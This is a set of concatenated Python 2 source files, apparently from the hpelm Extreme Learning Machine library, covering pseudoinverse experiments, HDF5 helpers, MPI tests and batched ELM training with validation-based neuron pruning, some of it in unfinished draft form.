W2 = np.fromfile("W.bin", dtype=np.float64).reshape(100,2)
W3 = np.linalg.pinv(H).dot(Y)
print np.linalg.norm(H.dot(W[:5,:]) - Y)
print np.linalg.norm(H.dot(W2[:5,:]) - Y)
print np.linalg.norm(H.dot(W3) - Y)
print "done"
"""
XP = np.linalg.pinv(X)
U,s,V = np.linalg.svd(X, full_matrices=False)
print "U"
print U
print "s"
print s
print "V"
print V
print "done"
raise IOError
X2 = U.dot( (np.diag(s)).dot(V) )
XP2 = ( V.T.dot(np.diag(1/s)) ).dot(U.T)
V2 = np.fromfile("A.bin", dtype=np.float64).reshape(100,100).T * -1
print V2[:3,:3]
print V[:3,:3]
s.astype(np.float64).tofile("s.bin")
assert np.allclose(X, X2)
print "svd correct"
assert np.allclose(XP.dot(X), np.eye(100))
print "Pseudoinverse correct"
assert np.allclose(XP2.dot(X), np.eye(100))
print "Pseudoinverse via SVD correct"
"""
<file_sep># -*- coding: utf-8 -*-
"""
Created on Sun Nov 23 19:09:30 2014
@author: akusok
"""
import numpy as np
from numpy import linalg
np.set_printoptions(precision=5, suppress=True)
def run():
#Y = np.random.rand(30,2)
N = 50
Y = np.zeros((N,2))
Y[:15,0] = 1
Y[15:,1] = 1
W = np.random.randn(2,5)
Y2 = Y.copy()
n = np.random.randint(1,9)
for _ in range(n):
k = np.random.randint(0,N)
Y2[k] = -Y2[k]+1
X = Y2.dot(W) + np.random.randn(N,5)*0.1
B = linalg.pinv(X).dot(Y)
Yh = X.dot(B)
err = np.mean((Y - Yh)**2)
#print np.argmax(Y,1)
#print np.argmax(Yh,1)
#print "train", err
N = X.shape[0]
C = linalg.inv(np.dot(X.T, X))
P = X.dot(C)
W = C.dot(X.T).dot(Y)
D = np.ones((N,)) - np.einsum('ij,ji->i', P, X.T)
e = (Y - X.dot(W)) / D.reshape((-1,1))
MSE = np.mean(e**2)
#print 'press', MSE
###################################################
### best classification error here ###
N = X.shape[0]
C = linalg.inv(np.dot(X.T, X))
P = X.dot(C)
W = C.dot(X.T).dot(Y)
D = np.ones((N,)) - np.einsum('ij,ji->i', P, X.T)
e = (Y.argmax(1) - X.dot(W).argmax(1)) / D.T
MCE = np.mean(e**2)
#print 'class', MCE
###################################################
e = Y.argmax(1) - X.dot(W).argmax(1)
MCE2 = np.mean(e**2)
#print 'clas2', MCE2
return MSE, MCE, MCE2
def run_multiclass():
#Y = np.random.rand(30,2)
N = 20
Y = np.random.rand(N,3)
Y = np.array(Y > 0.6, dtype=np.int)
W = np.random.randn(3,5)
Y2 = Y.copy()
for _ in range(np.random.randint(1,5)):
k = np.random.randint(0,N)
for _ in range(np.random.randint(0,3)):
j = np.random.randint(0,3)
Y2[k,j] = -Y2[k,j]+1
X = Y2.dot(W) + np.random.randn(N,5)*0.1
N = X.shape[0]
C = linalg.inv(np.dot(X.T, X))
P = X.dot(C)
W = C.dot(X.T).dot(Y)
D = np.ones((N,)) - np.einsum('ij,ji->i', P, X.T)
e = (Y - X.dot(W)) / D.reshape((-1,1))
MSE = np.mean(e**2)
#print 'press', MSE
###################################################
### best classification error here ###
N = X.shape[0]
C = linalg.inv(np.dot(X.T, X))
P = X.dot(C)
W = C.dot(X.T).dot(Y)
D = np.ones((N,)) - np.einsum('ij,ji->i', P, X.T)
e = ((Y>0.5) - (X.dot(W)>0.5)) / D.reshape((-1,1))
MCE = np.mean(e**2)
#print 'class', MCE
###################################################
e = ((Y>0.5) - (X.dot(W)>0.5))
MCE2 = np.mean(e**2)
#print 'clas2', MCE2
return MSE, MCE, MCE2
s = [0,0,0,0,0]
N = 10000
for _ in range(N):
m,m2,m3 = run_multiclass()
s[0] += m
s[1] += np.abs(m2-m)
s[2] += m2-m
s[3] += np.abs(m3-m)
s[4] += m3-m
s = np.array(s) * 100 / N
print "MSE, |MSE-MCE|, MSE-MCE, |MSE-MCE2|, MSE-MCE2"
print s
<file_sep># -*- coding: utf-8 -*-
"""
Created on Sat Nov 8 16:28:02 2014
@author: akusok
"""
import numpy as np
from tables import openFile, Atom
def h5write(filename, varname, data):
"""Writes one data matrix to HDF5 file.
Similar to Matlab function.
"""
assert isinstance(filename, basestring), "file name must be a string"
assert isinstance(varname, basestring), "variable name must be a string"
assert isinstance(data, np.ndarray), "data must be a Numpy array"
if len(data.shape) == 1:
data = data.reshape(-1,1)
# remove leading "/" from variable name
if varname[0] == "/":
varname = varname[1:]
try:
h5 = openFile(filename, "w")
a = Atom.from_dtype(data.dtype)
h5.create_array(h5.root, varname, data.T, atom=a) # transpose for Matlab compatibility
h5.flush()
finally:
h5.close()
def h5read(filename):
"""Reads one data matrix from HDF5 file, variable name does not matter.
Similar to Matlab function.
"""
h5 = openFile(filename)
for node in h5.walk_nodes(): # find the last node with whatever name
pass
M = node[:].T # transpose for Matlab compatibility
h5.close()
return M
<file_sep># -*- coding: utf-8 -*-
"""
Greville and OPIUM method from:
<NAME> and <NAME>,
"Learning the Pseudoinverse Solution to Network Weights"
Neural Networks
Created on Sun Aug 5 10:05:29 2012
@author: andrevanschaik
"""
from numpy import dot, exp, eye, sqrt
def Greville(x,ee,M,P): #Greville's method for recursive pseudoinverse
psi = dot(P,x)
nrm1 = 1+dot(x.T,psi)
P -= dot(psi,psi.T)/nrm1
M += dot(ee,psi.T)/nrm1
def OPIUM(x,ee,M,P,alpha): #OPIUM modification to Greville
psi = dot(P,x)
nrm1 = 1+dot(x.T,psi)
nrm2 = 1+alpha*(1-exp(-sqrt(dot(ee.T,ee))/ee.size))
P -= dot(psi,psi.T)/nrm1
P += alpha * eye(P.size**0.5) * (1-exp(-sqrt(dot(ee.T,ee))/ee.size))
P /= nrm2
M += dot(ee,psi.T)/nrm1
<file_sep># -*- coding: utf-8 -*-
"""
Created on Sun Oct 5 17:21:00 2014
@author: akusok
"""
import numpy as np
from mpi4py import MPI
def divide_X(X, size):
n = X.shape[0]
if n%size == 0:
batch = n / size
else:
batch = (n / size) + 1
Xd = []
for i in range(size):
Xd.append(X[batch*i:batch*(i+1)])
return Xd
comm = MPI.COMM_WORLD
rank = comm.Get_rank()
size = comm.Get_size()
if rank == 0: # master node
# distribute projection matrix
W = np.random.rand(20,100)
W = comm.bcast(W, root=0)
print "%d W: "%rank, W.shape
# distribute nonlinear transformation function
F = []
#F.extend([lambda x:x]*20)
F.extend([np.tanh]*100)
F = comm.bcast(F, root=0)
# distribute input data
X_input = np.random.randn(10000,20)
Xd = divide_X(X_input, size)
#del X_input
X = comm.scatter(Xd, root=0)
print "%d X: "%rank, X.shape
# do computations
Hp = X.dot(W).astype('d')
H = np.empty(Hp.shape)
for i in range(len(F)):
H[:,i] = F[i](Hp[:,i])
HpH = Hp.T.dot(Hp)
# obtain joined result
HH = np.empty(HpH.shape, dtype='d')
comm.Allreduce([HpH, MPI.DOUBLE], [HH, MPI.DOUBLE], op=MPI.SUM)
# check results
H2 = X_input.dot(W)
H2H = H2.T.dot(H2)
print "results are the same: ", np.allclose(HH, H2H)
print "%d done!" % rank
else: # worker nodes
# distribute projection matrix
W = comm.bcast(None, root=0)
print "%d W: "%rank, W.shape
# distribute nonlinear transformation function
F = comm.bcast(None, root=0)
# distribute input data
X = comm.scatter(None, root=0)
print "%d X: "%rank, X.shape
# do computations
Hp = X.dot(W).astype('d')
HpH = Hp.T.dot(Hp)
# obtain joined result
HH = np.empty(HpH.shape, dtype='d')
comm.Allreduce([HpH, MPI.DOUBLE], [HH, MPI.DOUBLE], op=MPI.SUM)
print "%d done!" % rank
<file_sep>'''
Created on Aug 18, 2014
@author: akusoka1
'''
from slfn import SLFN
from elm import ELM
from hp_elm import HPELM
from hpelm.modules.hdf5_tools import make_hdf5, normalize_hdf5
<file_sep># -*- coding: utf-8 -*-
"""
Created on Mon Oct 27 17:48:33 2014
@author: akusok
"""
import numpy as np
def train_hpv(self, HH, HT, Xv, Tv, Yv):
Beta = self._
HH, HT, Beta = self._project(X, T, solve=True)
Hv = self.project(Xv)
nn = Hv.shape[1]
e = np.ones((nn+1,)) * -1 # errors for all numbers of neurons
rank, nn = self._ranking(nn, Xv, Tv) # create ranking of neurons
Yv = np.dot(Hv, Beta)
err = self._error(Yv, Tv)
penalty = err * 0.01 / nn # penalty is 1% of error at max(nn)
e[nn] = err + nn * penalty
# MYOPT function
# [A B C D E] interval points,
# halve the interval each time
# initialize intervals
A = 1
E = nn
l = E - A
B = A + l/4
C = A + l/2
D = A + 3*l/4
l = 3 # run the while loop at least once
while l > 2:
# calculate errors at points
for idx in [A, B, C, D, E]:
if e[idx] == -1: # skip already calculated errors
rank1 = rank[:idx]
HH1 = HH[rank1, :][:, rank1]
HT1 = HT[rank1, :]
Beta = self._solve_corr(HH1, HT1)
Yv = np.dot(Hv[:, rank1], Beta)
e[idx] = self._error(Yv, Tv) + idx * penalty
m = min(e[A], e[B], e[C], e[D], e[E]) # find minimum element
# halve the search interval
if m in (e[A], e[B]):
E = C
C = B
elif m in (e[D], e[E]):
A = C
C = D
else:
A = B
E = D
l = E - A
B = A + l/4
D = A + (3*l)/4
k_opt = [n1 for n1 in [A, B, C, D, E] if e[n1] == m][0] # find minimum index
best_nn = rank[:k_opt]
self._prune(best_nn)
self.Beta = self._project(X, T, solve=True)[2]
print "%d of %d neurons selected with a validation set" % (len(best_nn), nn)
if len(best_nn) > nn*0.9:
print "Hint: try re-training with more hidden neurons"
<file_sep> # -*- coding: utf-8 -*-
"""
Created on Mon Oct 27 17:48:33 2014
@author: akusok
"""
import numpy as np
from numpy.linalg import lstsq
from modules.data_loader import batchX, batchT, meanstdX, c_dictT, decode
from modules.regularizations import semi_Tikhonov
from modules.error_functions import mse
from elm_abstract import ELM_abstract
class HPELM(ELM_abstract):
"""Extreme Learning Machine for Big Data.
"""
# inherited def add_neurons(self, number, func, W=None, B=None):
# inherited def save(self, model):
# inherited def load(self, model):
# inherited def _checkdata(self, X, T):
def __init__(self, inputs, outputs, kind="", batch=10000):
"""Create ELM of desired kind.
"""
super(HPELM, self).__init__(inputs, outputs, kind)
self.batch = batch
def project(self, X):
pass
def train(self, X, T, delimiter=" "):
"""Trains ELM, can use any X and T(=Y), and specify neurons.
Neurons: (number, type, [W], [B])
"""
# get parameters of new data and add neurons
self.Xmean, self.Xstd = meanstdX(X, self.batch, delimiter)
if self.classification:
self.C_dict = c_dictT(T, self.batch)
# get data iterators
genX, self.inputs, N = batchX(X, self.batch, delimiter)
genT, self.targets = batchT(T, self.batch, delimiter, self.C_dict)
# get mean value of targets
if self.classification or self.multiclass:
self.Tmean = np.zeros((self.targets,)) # for any classification
else:
self.Tmean, _ = meanstdX(T, self.batch, delimiter)
# project data
nn = len(self.ufunc)
HH = np.zeros((nn, nn))
HT = np.zeros((nn, self.targets))
for X, T in zip(genX, genT):
# get hidden layer outputs
H = np.dot(X, self.W)
for i in xrange(H.shape[1]):
H[:, i] = self.ufunc[i](H[:, i])
H, T = semi_Tikhonov(H, T, self.Tmean) # add Tikhonov regularization
# least squares solution - multiply both sides by H'
p = float(X.shape[0]) / N
HH += np.dot(H.T, H)*p
HT += np.dot(H.T, T)*p
# solve ELM model
HH += self.cI * np.eye(nn) # enhance solution stability
self.B = lstsq(HH, HT)[0]
#self.B = np.linalg.pinv(HH).dot(HT)
def predict(self, X, delimiter=" "):
"""Get predictions using a trained or loaded ELM model.
:param X: input data
:rtype: predictions Th
"""
assert self.B is not None, "train this model first"
genX, inputs, _ = batchX(X, self.batch, delimiter)
results = []
for X in genX:
assert self.inputs == inputs, "incorrect dimensionality of inputs"
# project test inputs to outputs
H = np.dot(X, self.W)
for i in xrange(H.shape[1]):
H[:, i] = self.ufunc[i](H[:, i])
Th1 = H.dot(self.B)
# additional processing for classification
if self.classification:
Th1 = decode(Th1, self.C_dict)
results.append(Th1)
# merge results
if isinstance(results[0], np.ndarray):
Th = np.vstack(results)
else:
Th = [] # merge results which are lists of items
for r1 in results:
Th.extend(r1)
return Th
def MSE(self, X, Y, delimiter=" "):
"""Mean Squared Error (or mis-classification error).
"""
MSE = 0
genX, _, N = batchX(X, self.batch, delimiter)
genT, _ = batchT(Y, self.batch, delimiter, self.C_dict)
for X, T in zip(genX, genT):
H = np.dot(X, self.W)
for i in xrange(H.shape[1]):
H[:, i] = self.ufunc[i](H[:, i])
Th1 = H.dot(self.B)
p = float(X.shape[0]) / N
MSE += mse(T, Th1, self.classification, self.multiclass) * p
return MSE
<file_sep># -*- coding: utf-8 -*-
"""
Created on Mon Oct 27 17:48:33 2014
@author: akusok
"""
import numpy as np
import multiprocessing as mp
#import Queue
#import threading
from time import time
from hpelm.modules import make_hdf5, ireader, iwriter
from tables import open_file
from slfn import SLFN
class HPELM(SLFN):
"""Interface for training Extreme Learning Machines.
"""
def _parse_args(self, args, kwargs, X, T):
"""Parse arguments of training, and prepare class variables.
Model structure selection (exclusive, choose one)
:param "V": use validation set
:param "CV": use cross-validation
Additional parameters for model structure selecation
:param Xv: validation data X ("V")
:param Tv: validation targets T ("V")
:param k: number of splits ("CV")
System setup
:param "c": build ELM for classification
:param "cb": build ELM with balanced classification
:param "mc": build ELM for multiclass classification
:param "adaptive"/"ad": build adaptive ELM for non-stationary model
:param "batch": batch size for adaptive ELM (sliding window step size)
"""
assert len(self.neurons) > 0, "Add neurons to ELM before training it"
args = [a.upper() for a in args] # make all arguments upper case
# kind of "enumerators", try to use only inside that script
MODELSELECTION = None # V / CV / None
ADAPTIVE = False # batch / None
# reset parameters
self.ranking = None
self.kmax_op = None
self.classification = None # c / wc / mc
self.weights_wc = None # weigths for weighted classification
# check exclusive parameters
assert len(set(args).intersection(set(["C", "WC", "MC"]))) <= 1, "Use only one of \
C (classification) / MC (multiclass) / WC (weighted classification)"
# parse parameters
for a in args:
if a == "C":
assert self.targets > 1, "Classification targets must have 1 output per class"
self.classification = "c"
if a == "WC":
assert self.targets > 1, "Classification targets must have 1 output per class"
assert "w" in kwargs.keys(), "Provide class weights for weighted classification"
w = kwargs['w']
assert len(w) == T.shape[1], "Number of class weights differs from number of target classes"
self.weights_wc = w
self.classification = "wc"
if a == "MC":
self.classification = "mc"
# if a in ("A", "AD", "ADAPTIVE"):
# assert "batch" in kwargs.keys(), "Provide batch size for adaptive ELM model (batch)"
# batch = kwargs['batch']
# ADAPTIVE = True
def train(self, fX, fT, *args, **kwargs):
"""Universal training interface for ELM model with model structure selection.
:param fX: input data HDF5 or matrix
:param fT: target data HDF5 or matrix
"""
X, T = self._checkdata(fX, fT)
self._parse_args(args, kwargs, X, T)
# traing the model
self.Beta = self._project(X, T, solve=True)[2]
def train_async(self, fX, fT, *args, **kwargs):
"""Universal training interface for ELM model with model structure selection.
:param fX: input data HDF5 or matrix
:param fT: target data HDF5 or matrix
"""
X, T = self._checkdata(fX, fT)
self._parse_args(args, kwargs, X, T)
# traing the model
self.Beta = self._project_async(fX, fT, X, T, solve=True)[2]
def _makeh5(self, h5name, N, d):
"""Creates HDF5 file opened in append mode.
"""
make_hdf5((N, d), h5name)
h5 = open_file(h5name, "a")
self.opened_hdf5.append(h5)
for node in h5.walk_nodes():
pass # find a node with whatever name
return node
def predict(self, fX, fY):
"""Iterative predict which saves data to HDF5, sequential version.
"""
assert self.Beta is not None, "Train ELM before predicting"
X, _ = self._checkdata(fX, None)
N = X.shape[0]
make_hdf5((N, self.targets), fY)
h5 = open_file(fY, "a")
self.opened_hdf5.append(h5)
for Y in h5.walk_nodes():
pass # find a node with whatever name
nn = np.sum([n1[1] for n1 in self.neurons])
batch = max(self.batch, nn)
nb = N / batch # number of batches
if N > batch * nb:
nb += 1
t = time()
t0 = time()
eta = 0
for b in xrange(0, nb):
start = b*batch
stop = min((b+1)*batch, N)
# get data
Xb = X[start:stop].astype(np.float64)
# process data
Hb = self.project(Xb)
Yb = Hb.dot(self.Beta)
# write data
Y[start:stop] = Yb
# report time
eta = int(((time()-t0) / (b+1)) * (nb-b-1))
if time() - t > self.tprint:
print "processing batch %d/%d, eta %d:%02d:%02d" % (b+1, nb, eta/3600, (eta % 3600)/60, eta % 60)
t = time()
self.opened_hdf5.pop()
h5.close()
def predict_async(self, fX, fY):
"""Iterative predict which saves data to HDF5, with asynchronous I/O by separate processes.
"""
assert self.Beta is not None, "Train ELM before predicting"
X, _ = self._checkdata(fX, None)
N = X.shape[0]
h5 = self.opened_hdf5.pop()
h5.close()
make_hdf5((N, self.targets), fY)
# start async reader and writer for HDF5 files
qr_in = mp.Queue()
qr_out = mp.Queue(1)
reader = mp.Process(target=ireader, args=(fX, qr_in, qr_out))
reader.daemon = True
reader.start()
qw_in = mp.Queue(1)
writer = mp.Process(target=iwriter, args=(fY, qw_in))
writer.daemon = True
writer.start()
nn = np.sum([n1[1] for n1 in self.neurons])
batch = max(self.batch, nn)
nb = N / batch # number of batches
if N > batch * nb:
nb += 1
t = time()
t0 = time()
eta = 0
for b in xrange(0, nb+1):
start_next = b*batch
stop_next = min((b+1)*batch, N)
# prefetch data
qr_in.put((start_next, stop_next)) # asyncronous reading of next data batch
if b > 0: # first iteration only prefetches data
# get data
Xb = qr_out.get()
Xb = Xb.astype(np.float64)
# process data
Hb = self.project(Xb)
Yb = Hb.dot(self.Beta)
# save data
qw_in.put((Yb, start, stop))
start = start_next
stop = stop_next
# report time
eta = int(((time()-t0) / (b+1)) * (nb-b-1))
if time() - t > self.tprint:
print "processing batch %d/%d, eta %d:%02d:%02d" % (b+1, nb, eta/3600, (eta % 3600)/60, eta % 60)
t = time()
qw_in.put(None)
reader.join()
writer.join()
def _project(self, X, T, solve=False, wwc=None):
"""Create HH, HT matrices and computes solution Beta.
HPELM-specific parallel projection.
Returns solution Beta if solve=True.
Runs on GPU if self.accelerator="GPU".
Performs balanced classification if self.classification="cb".
"""
# initialize
nn = np.sum([n1[1] for n1 in self.neurons])
batch = max(self.batch, nn)
N = X.shape[0]
nb = N / batch # number of batches
if N > batch * nb:
nb += 1
HH = np.zeros((nn, nn)) # init data holders
HT = np.zeros((nn, self.targets))
if self.classification == "wc": # weighted classification initialization
ns = np.zeros((self.targets,))
for b in xrange(nb): # batch sum is much faster
ns += T[b*batch: (b+1)*batch].sum(axis=0)
wc = (float(ns.sum()) / ns) * self.weights_wc # class weights normalized to number of samples
wc = wc**0.5 # because it gets applied twice
if wwc is not None:
wc = wwc
if self.accelerator == "GPU":
s = self.magma_solver.GPUSolver(nn, self.targets, self.alpha)
else:
HH.ravel()[::nn+1] += self.alpha # add to matrix diagonal trick
# main loop over all the data
t = time()
t0 = time()
eta = 0
for b in xrange(nb):
eta = int(((time()-t0) / (b+0.0000001)) * (nb-b))
if time() - t > self.tprint:
print "processing batch %d/%d, eta %d:%02d:%02d" % (b+1, nb, eta/3600, (eta % 3600)/60, eta % 60)
t = time()
start = b*batch
stop = min((b+1)*batch, N)
Xb = X[start:stop].astype(np.float64)
Tb = T[start:stop].astype(np.float64)
Hb = self.project(Xb)
if self.classification == "wc": # apply per-sample weighting
ci = Tb.argmax(1)
Hb *= wc[ci, None]
Tb *= wc[ci, None]
if self.accelerator == "GPU":
s.add_data(Hb, Tb)
else:
HH += np.dot(Hb.T, Hb)
HT += np.dot(Hb.T, Tb)
# get computed matrices back
if self.accelerator == "GPU":
HH, HT = s.get_corr()
if solve:
Beta = s.solve()
s.finalize()
elif solve:
Beta = self._solve_corr(HH, HT)
# return results
if solve:
return HH, HT, Beta
else:
return HH, HT
def _project_async(self, fX, fT, X, T, solve=False, wwc=None):
"""Create HH, HT matrices and computes solution Beta, copy of _project but with async I/O.
HPELM-specific parallel projection.
Returns solution Beta if solve=True.
Runs on GPU if self.accelerator="GPU".
Performs balanced classification if self.classification="cb".
"""
# initialize
nn = np.sum([n1[1] for n1 in self.neurons])
batch = max(self.batch, nn)
N = X.shape[0]
nb = N / batch # number of batches
if N > batch * nb:
nb += 1
HH = np.zeros((nn, nn)) # init data holders
HT = np.zeros((nn, self.targets))
if self.classification == "wc": # weighted classification initialization
ns = np.zeros((self.targets,))
for b in xrange(nb): # batch sum is much faster
ns += T[b*batch: (b+1)*batch].sum(axis=0)
wc = (float(ns.sum()) / ns) * self.weights_wc # class weights normalized to number of samples
wc = wc**0.5 # because it gets applied twice
if wwc is not None:
wc = wwc
if self.accelerator == "GPU":
s = self.magma_solver.GPUSolver(nn, self.targets, self.alpha)
else:
HH.ravel()[::nn+1] += self.alpha # add to matrix diagonal trick
# close X and T files
h5 = self.opened_hdf5.pop()
h5.close()
h5 = self.opened_hdf5.pop()
h5.close()
# start async reader and writer for HDF5 files
qX_in = mp.Queue()
qX_out = mp.Queue(1)
readerX = mp.Process(target=ireader, args=(fX, qX_in, qX_out))
readerX.daemon = True
readerX.start()
qT_in = mp.Queue()
qT_out = mp.Queue(1)
readerT = mp.Process(target=ireader, args=(fT, qT_in, qT_out))
readerT.daemon = True
readerT.start()
t = time()
t0 = time()
eta = 0
# main loop over all the data
for b in xrange(0, nb+1):
start_next = b*batch
stop_next = min((b+1)*batch, N)
# prefetch data
qX_in.put((start_next, stop_next)) # asyncronous reading of next data batch
qT_in.put((start_next, stop_next))
if b > 0: # first iteration only prefetches data
Xb = qX_out.get()
Tb = qT_out.get()
Xb = Xb.astype(np.float64)
Tb = Tb.astype(np.float64)
# process data
Hb = self.project(Xb)
if self.classification == "wc": # apply per-sample weighting
ci = Tb.argmax(1)
Hb *= wc[ci, None]
Tb *= wc[ci, None]
if self.accelerator == "GPU":
s.add_data(Hb, Tb)
else:
HH += np.dot(Hb.T, Hb)
HT += np.dot(Hb.T, Tb)
# report time
eta = int(((time()-t0) / (b+1)) * (nb-b-1))
if time() - t > self.tprint:
print "processing batch %d/%d, eta %d:%02d:%02d" % (b+1, nb, eta/3600, (eta % 3600)/60, eta % 60)
t = time()
readerX.join()
readerT.join()
# get computed matrices back
if self.accelerator == "GPU":
HH, HT = s.get_corr()
if solve:
Beta = s.solve()
s.finalize()
elif solve:
Beta = self._solve_corr(HH, HT)
# return results
if solve:
return HH, HT, Beta
else:
return HH, HT
def _error(self, Y1, T1, H1=None, Beta=None, rank=None):
"""Do projection and calculate error in batch mode.
HPELM-specific iterative error for all usage cases.
Can be _error(Y, T) or _error(None, T, H, Beta, rank)
:param T: - true targets for error calculation
:param H: - projected data for error calculation
:param Beta: - current projection matrix
:param rank: - selected neurons (= columns of H)
"""
if Y1 is None:
H, T = self._checkdata(H1, T1)
assert rank.shape[0] == Beta.shape[0], "Wrong dimension of Beta for the given ranking"
assert T.shape[1] == Beta.shape[1], "Wrong dimension of Beta for the given targets"
nn = rank.shape[0]
else:
_, Y = self._checkdata(None, Y1)
_, T = self._checkdata(None, T1)
nn = np.sum([n1[1] for n1 in self.neurons])
N = T.shape[0]
batch = max(self.batch, nn)
nb = N / batch # number of batches
if N > batch * nb:
nb += 1
if self.classification == "c":
err = 0
for b in xrange(nb):
start = b*batch
stop = min((b+1)*batch, N)
Tb = np.array(T[start:stop])
if Y1 is None:
Hb = H[start:stop, rank]
Yb = np.dot(Hb, Beta)
else:
Yb = np.array(Y[start:stop])
errb = np.mean(Yb.argmax(1) != Tb.argmax(1))
err += errb * float(stop-start)/N
elif self.classification == "wc": # weighted classification
c = T.shape[1]
errc = np.zeros(c)
for b in xrange(nb):
start = b*batch
stop = min((b+1)*batch, N)
Tb = np.array(T[start:stop])
if Y1 is None:
Hb = H[start:stop, rank]
Yb = np.dot(Hb, Beta)
else:
Yb = np.array(Y[start:stop])
for i in xrange(c): # per-class MSE
idxc = Tb[:, i] == 1
errb = np.mean(Yb[idxc].argmax(1) != i)
errc[i] += errb * float(stop-start)/N
err = np.mean(errc * self.weights_wc)
elif self.classification == "mc":
err = 0
for b in xrange(nb):
start = b*batch
stop = min((b+1)*batch, N)
Tb = np.array(T[start:stop])
if Y1 is None:
Hb = H[start:stop, rank]
Yb = np.dot(Hb, Beta)
else:
Yb = np.array(Y[start:stop])
errb = np.mean((Yb > 0.5) != (Tb > 0.5))
err += errb * float(stop-start)/N
else: # MSE error
err = 0
for b in xrange(nb):
start = b*batch
stop = min((b+1)*batch, N)
Tb = T[start:stop]
if Y1 is None:
Hb = H[start:stop, rank]
Yb = np.dot(Hb, Beta)
else:
Yb = Y[start:stop]
errb = np.mean((Tb - Yb)**2)
err += errb * float(stop-start)/N
return err
def train_hpv(self, HH, HT, Xv, Tv, steps=10):
X, T = self._checkdata(Xv, Tv)
N = X.shape[0]
nn = HH.shape[0]
nns = np.logspace(np.log(3), np.log(nn), steps, base=np.e, endpoint=True)
nns = np.ceil(nns).astype(np.int)
nns = np.unique(nns) # numbers of neurons to check
print nns
k = nns.shape[0]
err = np.zeros((k,)) # errors for these numbers of neurons
batch = max(self.batch, nn)
nb = N / batch # number of batches
if N > batch * nb:
nb += 1
Betas = [] # keep all betas in memory
for l in nns:
Betas.append(self._solve_corr(HH[:l, :l], HT[:l, :]))
t = time()
t0 = time()
eta = 0
for b in xrange(nb):
eta = int(((time()-t0) / (b+0.0000001)) * (nb-b))
if time() - t > self.tprint:
print "processing batch %d/%d, eta %d:%02d:%02d" % (b+1, nb, eta/3600, (eta % 3600)/60, eta % 60)
t = time()
start = b*batch
stop = min((b+1)*batch, N)
alpha = float(stop-start)/N
Tb = np.array(T[start:stop])
Xb = np.array(X[start:stop])
Hb = self.project(Xb)
for i in xrange(k):
hb1 = Hb[:, :nns[i]]
Yb = np.dot(hb1, Betas[i])
err[i] += self._error(Yb, Tb) * alpha
k_opt = np.argmin(err)
best_nn = nns[k_opt]
self._prune(np.arange(best_nn))
self.Beta = Betas[k_opt]
del Betas
print "%d of %d neurons selected with a validation set" % (best_nn, nn)
if best_nn > nn*0.9:
print "Hint: try re-training with more hidden neurons"
return nns, err
def train_myhpv(self, HH, HT, Xv, Tv, steps=10):
X, T = self._checkdata(Xv, Tv)
N = X.shape[0]
nn = HH.shape[0]
nns = np.logspace(np.log(3), np.log(nn), steps, base=np.e, endpoint=True)
nns = np.ceil(nns).astype(np.int)
nns = np.unique(nns) # numbers of neurons to check
k = nns.shape[0]
err = np.zeros((k, 2, 2)) # errors for these numbers of neurons
batch = max(self.batch, nn)
nb = N / batch # number of batches
if N > batch * nb:
nb += 1
Betas = [] # keep all betas in memory
for l in nns:
Betas.append(self._solve_corr(HH[:l, :l], HT[:l, :]))
t = time()
t0 = time()
eta = 0
for b in xrange(nb):
eta = int(((time()-t0) / (b+0.0000001)) * (nb-b))
if time() - t > self.tprint:
print "processing batch %d/%d, eta %d:%02d:%02d" % (b+1, nb, eta/3600, (eta % 3600)/60, eta % 60)
t = time()
start = b*batch
stop = min((b+1)*batch, N)
Tb = np.array(T[start:stop])
Xb = np.array(X[start:stop])
Hb = self.project(Xb)
Tc = np.argmax(Tb, axis=1)
for i in xrange(k):
hb1 = Hb[:, :nns[i]]
Yb = np.dot(hb1, Betas[i])
Yc = np.argmax(Yb, axis=1)
err[i, 0, 0] += np.sum((Tc == 0)*(Yc == 0))
err[i, 0, 1] += np.sum((Tc == 0)*(Yc == 1))
err[i, 1, 0] += np.sum((Tc == 1)*(Yc == 0))
err[i, 1, 1] += np.sum((Tc == 1)*(Yc == 1))
return nns, err, N
<file_sep># -*- coding: utf-8 -*-
"""
Created on Fri Feb 27 05:16:53 2015
@author: Anton
"""
import numpy as np
import numexpr as ne
import os
from matplotlib import pyplot as plt
class elm(object):
def __init__(self):
self.sigm = lambda a: ne.evaluate("1/(1+exp(-a))")
def train(self, X, T, nn, idx):
n,d = X.shape
np.random.seed()
W = np.random.randn(d, nn) * 3**0.5
bias = np.random.randn(nn)
self.W = W
self.bias = bias
H = np.dot(X,W) + bias # random projection
H = self.sigm(H) # non-linear transformation
#self.B = np.dot(np.linalg.pinv(H), T) # linear regression
##################################################
H1 = H[T[:,0]==1]
T1 = T[T[:,0]==1]
HH1 = np.dot(H1.T, H1) + 1E-6*np.eye(H1.shape[1])
HT1 = np.dot(H1.T, T1)
#H2 = H[T[:,1]==1]
#T2 = T[T[:,1]==1]
H2 = H[idx]
T2 = T[idx]
HH2 = np.dot(H2.T, H2) + 1E-6*np.eye(H2.shape[1])
HT2 = np.dot(H2.T, T2)
"""
### RESAMPLING
Nsampl = H2.shape[0]
s = (np.std(X[T[:,0]==1], axis=0) + np.std(X[idx], axis=0) + np.std(X[T[:,2]==1], axis=0)) / 3
Nres = (np.sum(T[:,0]==1) + np.sum(T[:,2]==1)) / 2
Xres = np.zeros((Nres, d))
for i in xrange(Nres):
sampl = X[idx][np.random.randint(Nsampl)]
Xres[i] = sampl + np.random.randn(1,d)*s
H2res = np.dot(Xres,W) + bias
H2res = self.sigm(H2res)
T2res = np.tile(T2[0], (Nres,1))
H2 = np.vstack((H2, H2res))
T2 = np.vstack((T2, T2res))
HH2 = np.dot(H2.T, H2) + 1E-6*np.eye(H2.shape[1])
HT2 = np.dot(H2.T, T2)
#"""
Xres=np.zeros((3,2))
H3 = H[T[:,2]==1]
T3 = T[T[:,2]==1]
HH3 = np.dot(H3.T, H3) + 1E-6*np.eye(H3.shape[1])
HT3 = np.dot(H3.T, T3)
N = n*1.0
k = np.array([1, 1, 1], dtype=np.float64)
k = np.array([N/H1.shape[0], N/H2.shape[0], N/H3.shape[0]]).astype(np.float64)
k = k / np.sum(k)
HH = k[0]*HH1 + k[1]*HH2 + k[2]*HH3
HT = k[0]*HT1 + k[1]*HT2 + k[2]*HT3
##################################################
#HH = H.T.dot(H) + 1E-6*np.eye(H.shape[1])
#HT = H.T.dot(T)
self.B = np.linalg.lstsq(HH, HT)[0]
return Xres
def run(self, X):
H = np.dot(X, self.W) + self.bias
H = self.sigm(H)
return np.dot(H, self.B)
def code(nn):
folder = 'Classification-Iris'
folder = os.path.join(os.path.dirname(__file__), "../datasets", folder)
acc = np.zeros((10,))
for i in range(10): # 10-fold cross-validation
# get file names
